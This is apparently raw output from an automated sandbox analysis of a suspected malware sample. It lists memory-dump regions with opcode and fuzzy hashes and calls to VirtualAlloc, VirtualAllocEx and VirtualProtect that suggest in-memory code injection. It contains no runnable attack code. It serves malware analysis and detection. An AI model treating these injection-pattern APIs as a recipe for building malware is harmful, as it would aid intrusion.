                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 1150efacbe9d584e5d6aad7fab4e376f2e882354846ab2f328df35a1ea083d3d
                                                                  • Instruction ID: 145cd09f0b0a1904dfe5d1d69f32eab02ce2ba2e3f57008583dc2671dbb566e4
                                                                  • Opcode Fuzzy Hash: 1150efacbe9d584e5d6aad7fab4e376f2e882354846ab2f328df35a1ea083d3d
                                                                  • Instruction Fuzzy Hash: 932113B1C003498FDB10DFAAC884BEEFBF5AF88320F54842AD519A7240D7789945CFA1
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 06B4037C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724869209.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: b3310f1060af3e1328e641a3f20dea74230ad347674fc95d962cf4ef95d20dfa
                                                                  • Instruction ID: fd4a3cd31fb8dc271c9d4bc97e1c2a622fa27cd23febd817c0b226919c185124
                                                                  • Opcode Fuzzy Hash: b3310f1060af3e1328e641a3f20dea74230ad347674fc95d962cf4ef95d20dfa
                                                                  • Instruction Fuzzy Hash: 5511F4B1D007499FDB10DFAAC884BAEFBF4EF88320F54842AD519A7240C7789945CFA1
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D62BFE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: da676cd8db34dbf819e369cff6a0d1ab5167a3b17e4d0adb3ba462bc09e30c08
                                                                  • Instruction ID: 6d6737efa95d6e971c2962d8c916dc7f26f1fde57b7b5c03a590e20961196a42
                                                                  • Opcode Fuzzy Hash: da676cd8db34dbf819e369cff6a0d1ab5167a3b17e4d0adb3ba462bc09e30c08
                                                                  • Instruction Fuzzy Hash: 78113772900349DFDB10DFAAD844BDFBBF5AF88324F14881AE51AA7240C7759554CFA0
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D62BFE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: bc9af7d46b06f173e4e1dcb4f3109b5b7ee9e2f8412909cd288d1819e9938391
                                                                  • Instruction ID: c266d65edf8216e3da2b79b454f0a5813b21d47a3d9f7cae41693169c9b1bacb
                                                                  • Opcode Fuzzy Hash: bc9af7d46b06f173e4e1dcb4f3109b5b7ee9e2f8412909cd288d1819e9938391
                                                                  • Instruction Fuzzy Hash: 5F115676800309CFDB10DFAAC8457EEBBF5AF48314F14881AE51AA7240C7399654CBA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %
                                                                  • API String ID: 0-2567322570
                                                                  • Opcode ID: b7b3f68718b417f728a1f85be227912ac032d404b72587fe3e57cd7b67693828
                                                                  • Instruction ID: 4d4916ac4b85c942c4dc1495071b5ae4a3ce7f2ca72a9a6c0f8907c84363aee1
                                                                  • Opcode Fuzzy Hash: b7b3f68718b417f728a1f85be227912ac032d404b72587fe3e57cd7b67693828
                                                                  • Instruction Fuzzy Hash: 3141A0B4904268CBEBA4DF68C885BE9BBB2FB49304F50809AD54EA7340DB755EC58F50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06B4135B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724869209.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06B4135B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724869209.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Instruction ID: 1df93d0852e019512a3b2aa1957d389dc892e9c986fb3a320dd315034c45e52e
                                                                  • Opcode Fuzzy Hash: de918e2c4fa3b83116922c49c287c71b51b02c6237751cb97a04961f38ab13f2
                                                                  • Instruction Fuzzy Hash: 04512BB0D00618DFDB54EFA9D880AEDBBF7FF89304F50856AE459A7240DB74A985CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 45e7d0869acbaa19e8d437d125919a50eb861a964cb4a9fbc141c2eaf4a9de41
                                                                  • Instruction ID: 31a86c57e027843a0026ece24ce179352e1330099698371b33010e414fcc2157
                                                                  • Opcode Fuzzy Hash: 45e7d0869acbaa19e8d437d125919a50eb861a964cb4a9fbc141c2eaf4a9de41
                                                                  • Instruction Fuzzy Hash: BF51F9B5D04209CFDB44DFA9D894AEEBBF6FB48300F60902AD506A7354EB785985CF84
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 241d1a443e5d5fb89f213581bc9433cda2d965c2cdf6e35c093d0f9521e3a511
                                                                  • Instruction ID: 4f5345d043eaa99fbd003e7aff8a0446d78ee71ef79df844b09e55f928ef509b
                                                                  • Opcode Fuzzy Hash: 241d1a443e5d5fb89f213581bc9433cda2d965c2cdf6e35c093d0f9521e3a511
                                                                  • Instruction Fuzzy Hash: 50619478E00658DFDB44EFAAD48499CBBF1FF89310F10856AE91AAB360D730A905CF54
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64c391256f5696559b70ca67d409872bc2b84ba9879cf149b9c1da7a8ce0a1bc
                                                                  • Instruction ID: 1e3788579b369a5d79e24a52377a4fd65995bc4584b461bb5e42bc3911c0d8a8
                                                                  • Opcode Fuzzy Hash: 64c391256f5696559b70ca67d409872bc2b84ba9879cf149b9c1da7a8ce0a1bc
                                                                  • Instruction Fuzzy Hash: 8A51C274A06218CFEB90DF69D884BEDBBB6FB89304F5080AAD41AA7251DB745D80CF41
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 28caa73f9afa2f525249d58c2efbb04a4832ff6db1b8dc95083f7165443a9c69
                                                                  • Instruction ID: 8958a2478556e3e8f392661f080b199921fbcd759bf0be365ea6e54ad481b1e1
                                                                  • Opcode Fuzzy Hash: 28caa73f9afa2f525249d58c2efbb04a4832ff6db1b8dc95083f7165443a9c69
                                                                  • Instruction Fuzzy Hash: 7851F8B4D05218CFDB94EFAAD5846EDBBB2FF48304FA0812AD406A7254D7745E42CF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 132fea92714d9ac8c70a1fb2ba7a43b4a577726c188b36731bf5e5a91c709c84
                                                                  • Instruction ID: f190067c40bcf6c97846447a5e51a7751eeb24379af31fe6fe9af682ba103278
                                                                  • Opcode Fuzzy Hash: 132fea92714d9ac8c70a1fb2ba7a43b4a577726c188b36731bf5e5a91c709c84
                                                                  • Instruction Fuzzy Hash: E7510374A06208CBEB94DF69D884BEDBBB7FB89300F5080AAD419A7350DB745D85CF81
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12f699d24f9f071ff49f1ad4208a9f569e23b3b26b4ae865819064d441e96843
                                                                  • Instruction ID: 2229017ac984968cbb28a76558f54c474465de1e9453540e176712df53d46550
                                                                  • Opcode Fuzzy Hash: 12f699d24f9f071ff49f1ad4208a9f569e23b3b26b4ae865819064d441e96843
                                                                  • Instruction Fuzzy Hash: 4651B174E06218CFEB90DF69D884BEDBBB2FB85304F5081AAD419A7251DB745D81CF81
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fa9d21f2853b9cf87dd2d1167ac9c92e936b0a3f5ddf3dbf31b26d6f2fd44e6
                                                                  • Instruction ID: d96292359a61ae14c1da16743d1f07312d55dc51caa6e0b7bfcc92896d04ff0b
                                                                  • Opcode Fuzzy Hash: 8fa9d21f2853b9cf87dd2d1167ac9c92e936b0a3f5ddf3dbf31b26d6f2fd44e6
                                                                  • Instruction Fuzzy Hash: C151B5B4D01208DFDB68DFB9D594AADBBF2BF88300F60812AE815AB354DB359941CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bf3699c46c58d1c55a1b2f72c7c9befd512689c73031171259868f6f634109f
                                                                  • Instruction ID: 0197d66baa99e18af425fcd20bb4c3b438b66e2530b0db2cf09703d5d9ad694c
                                                                  • Opcode Fuzzy Hash: 6bf3699c46c58d1c55a1b2f72c7c9befd512689c73031171259868f6f634109f
                                                                  • Instruction Fuzzy Hash: 71411AB4D00619DBDB14EFA9D840ADDBBB6FF89310F10951AE45AB7244DB74A885CF80
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2083362c7a6f428415fd0023bc5deda78971514327b05be46a5281bc29822322
                                                                  • Instruction ID: 987a30435bf3e1885d61ad0d102e04cb65a03473df446cfef506f7cd422a7adc
                                                                  • Opcode Fuzzy Hash: 2083362c7a6f428415fd0023bc5deda78971514327b05be46a5281bc29822322
                                                                  • Instruction Fuzzy Hash: 3841C670D01208DFDB68DFB9C454A9DBBF2BF88301F64852EE815AB254DB359981CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 88817f82d99470591531f48a823927794fcf0f31a2c5a541dfce8917b87c500f
                                                                  • Instruction ID: 25a1c589cd0fab4de3f3f6f879f84ab37c49c63118083a6011a9fb1eeec0bfb0
                                                                  • Opcode Fuzzy Hash: 88817f82d99470591531f48a823927794fcf0f31a2c5a541dfce8917b87c500f
                                                                  • Instruction Fuzzy Hash: 33310974E04209DFDB44EFAAD4446EEBBF6EB89304F10C069D929A7358DB345945CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: caee35ad30e342f22decec9dc5c1b39376fa8676b3afb108bbdfa388f75a0f87
                                                                  • Instruction ID: 43466b304b606135599656933b51e6fe2a5961b51129fa9e349b9f62d4a542bf
                                                                  • Opcode Fuzzy Hash: caee35ad30e342f22decec9dc5c1b39376fa8676b3afb108bbdfa388f75a0f87
                                                                  • Instruction Fuzzy Hash: 40315970D01249DFDB10DFA9D584AEEBFF6AF48354F24842AE909AB250CB74A945CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 379f7c56d2e5d3b5b25dea7a2542ca291d929ff1edf17270086734480383c8b1
                                                                  • Instruction ID: adb5ace4e1d9c57905cc505427e440229e59b7408713944ece835425c0785ef0
                                                                  • Opcode Fuzzy Hash: 379f7c56d2e5d3b5b25dea7a2542ca291d929ff1edf17270086734480383c8b1
                                                                  • Instruction Fuzzy Hash: 3921EE31B00309CFCF099B6984586FD77FAFB89218B104569E6029F640CF366D86CB9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 110ccb9f6460b187ee1d35c2b74cfef630bbe1cff67405aebd1761b2b6c25994
                                                                  • Instruction ID: 02c118e8a70540cae1a532d30dd1aaeb8736ef56dcee248e79f4ac71a2eda283
                                                                  • Opcode Fuzzy Hash: 110ccb9f6460b187ee1d35c2b74cfef630bbe1cff67405aebd1761b2b6c25994
                                                                  • Instruction Fuzzy Hash: FB315A70D01249DFDB10CFAAC594AEEBFF6AF48354F248029E909AB350DB34A945CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7077861fee010c0902ac985667984cba19ecd8979f3205be179685e4e1905a59
                                                                  • Instruction ID: 4f0e7d726bb1824051eee0ac2e4a16338ea83c094627f3666967eb71b3b8ac03
                                                                  • Opcode Fuzzy Hash: 7077861fee010c0902ac985667984cba19ecd8979f3205be179685e4e1905a59
                                                                  • Instruction Fuzzy Hash: 2F41E474A00229CFDB94DF68D895BE9BBB2FB89300F4080AAD55DA7351DB349D81CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ed082d4c1d126e044803a9b45a18cfbc81179f1104f2374ba8d778bf67bc2ec0
                                                                  • Instruction ID: dd7cfa6ad5093b267f3ba4bd61ea223ae2d3afababbb04574c5ea85f3ceac6a1
                                                                  • Opcode Fuzzy Hash: ed082d4c1d126e044803a9b45a18cfbc81179f1104f2374ba8d778bf67bc2ec0
                                                                  • Instruction Fuzzy Hash: B6314A74E14209CFEB44CF6AD841AEEBBF6FB89300F50806AD45AA7290DB749D45CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724967697.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 13aa0b938f9188a93a4a8cb924d686873132abc6420d6fbc3daa8bb3d05446c1
                                                                  • Instruction ID: d232be158a7ecfe753b2729e26676a623dcb6fe8b4cf18b20930acec4684774f
                                                                  • Opcode Fuzzy Hash: 13aa0b938f9188a93a4a8cb924d686873132abc6420d6fbc3daa8bb3d05446c1
                                                                  • Instruction Fuzzy Hash: 2731A0B0D04249CFEB59CFAAD4146EEBBB1FF85301F1080EAE055A7291C7384A45CFA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f12d27eac2591c4962a67903ca5cc7cdf95ef3e17611e49f45e876f849f618b2
                                                                  • Instruction ID: 5248c5373c86916f37adc34ac5416c2c7f15f5340cf40ea4048a4361754634b1
                                                                  • Opcode Fuzzy Hash: f12d27eac2591c4962a67903ca5cc7cdf95ef3e17611e49f45e876f849f618b2
                                                                  • Instruction Fuzzy Hash: DC217E74E0020ADFDB44DF69D840AEEB7F6FB89300F908076D41AA7250DB749D41CB95
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d117d6c227b46d77b0611b468b4fd49722868ebb6b62795da0171d03b13d88e
                                                                  • Instruction ID: 794060f04f3ce6cada5d6172be336920a744367f34f4c850be80eb44c5e2326e
                                                                  • Opcode Fuzzy Hash: 1d117d6c227b46d77b0611b468b4fd49722868ebb6b62795da0171d03b13d88e
                                                                  • Instruction Fuzzy Hash: FB31A070A05259CFEBA4DF58C894BE9B7B2BB49304F5080DAD10EA7250CB759EC5CF14
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69696028514.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_102d000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e041b213ddc0d3cf8eca14f94a64838c24f6e1fccb2e290a35f4c4f5b9146cf
                                                                  • Instruction ID: 92a0fd2875cb9098066e984451cd5a2b045a4ef557423a67f39a0e4dfcfd44b7
                                                                  • Opcode Fuzzy Hash: 6e041b213ddc0d3cf8eca14f94a64838c24f6e1fccb2e290a35f4c4f5b9146cf
                                                                  • Instruction Fuzzy Hash: 48210771504240EFDB11DF58E9C4B1ABFA5FB84314F24C5ADED450B256C33AD846CBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69696028514.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_102d000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69695843159.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_101d000_IsNestedFamANDAssem.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c4fcffb80143524dc4d34c8e76eed28c48dd1b4c07af85823bdc4eadb4dadaba
                                                                  • Instruction ID: 91a57a3d78630b8f00497d209e497257c07368717273b79a896086c6c0392120
                                                                  • Opcode Fuzzy Hash: c4fcffb80143524dc4d34c8e76eed28c48dd1b4c07af85823bdc4eadb4dadaba
                                                                  • Instruction Fuzzy Hash: 3E1183B4905218CFEBA0CF15D884BE877B2BB49315F5041DAD04EA7280DB795EC5CF54
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0419310b13104d3e96d5b1118f7e84483baf4a9b2e86131b3b23ce123240f5cc
                                                                  • Instruction ID: fc2c1dbd45252e238a6cd6b0c54853e156708e130e3fd006580d571e692a6c73
                                                                  • Opcode Fuzzy Hash: 0419310b13104d3e96d5b1118f7e84483baf4a9b2e86131b3b23ce123240f5cc
                                                                  • Instruction Fuzzy Hash: A90128B0D05208EFCB50EFB8D9446AEBBF8EB49304F2045AED848E3244E7355B41CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 29177605de0d6b4c4e4efadde9b3a561d3375b7b7eb05259083ca4a2b0892960
                                                                  • Instruction ID: dc5603a49a535c6567393c0a98748df983733cf6c8c2b995957a8a78290d717a
                                                                  • Opcode Fuzzy Hash: 29177605de0d6b4c4e4efadde9b3a561d3375b7b7eb05259083ca4a2b0892960
                                                                  • Instruction Fuzzy Hash: EB119D74904228CFEBA0CF59D884BD8B7B2BB49305F50819AD44DAB344DB785E89CF54
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d621cfba60ec20d37f342ba8c8ac2c843ff2466ed0b81fa8b7fbfbc61f8e6849
                                                                  • Instruction ID: cfc656d4eeceb8550f4d813a545c02ee0f0093dd6e46877cbddb1fe3b4ce6e32
                                                                  • Opcode Fuzzy Hash: d621cfba60ec20d37f342ba8c8ac2c843ff2466ed0b81fa8b7fbfbc61f8e6849
                                                                  • Instruction Fuzzy Hash: AC01563180430AABCF12DF99C8008EEBB76EF49310F04C54AE99823211D331A666CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fbaffc86a8ff493bbbd6ec0f7ab952b875fa138acad3e370536de0da6514248
                                                                  • Instruction ID: 41f53fa132521c91bf11cc0dbd27b57632150d1f76b5d26b1314f56ceb80dc6b
                                                                  • Opcode Fuzzy Hash: 9fbaffc86a8ff493bbbd6ec0f7ab952b875fa138acad3e370536de0da6514248
                                                                  • Instruction Fuzzy Hash: 2FF0FF75E09240CBE3118FA488545E8BF72EB4A200F0880CFC8C65B686CA76C607C751
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c81abec7ac8ed5ebe1168efac8f166aa1fd86a88b149cf3c14ba5da2084f4d2
                                                                  • Instruction ID: 657d8002a0c5c0274f5294d2980cd17fb46f368ec470bb72b1cbd749cb05382f
                                                                  • Opcode Fuzzy Hash: 1c81abec7ac8ed5ebe1168efac8f166aa1fd86a88b149cf3c14ba5da2084f4d2
                                                                  • Instruction Fuzzy Hash: 7701D774900219CFEB50CFA9C981BEDB7F2FB08315F5080AAD419A7291DB759E41CF40
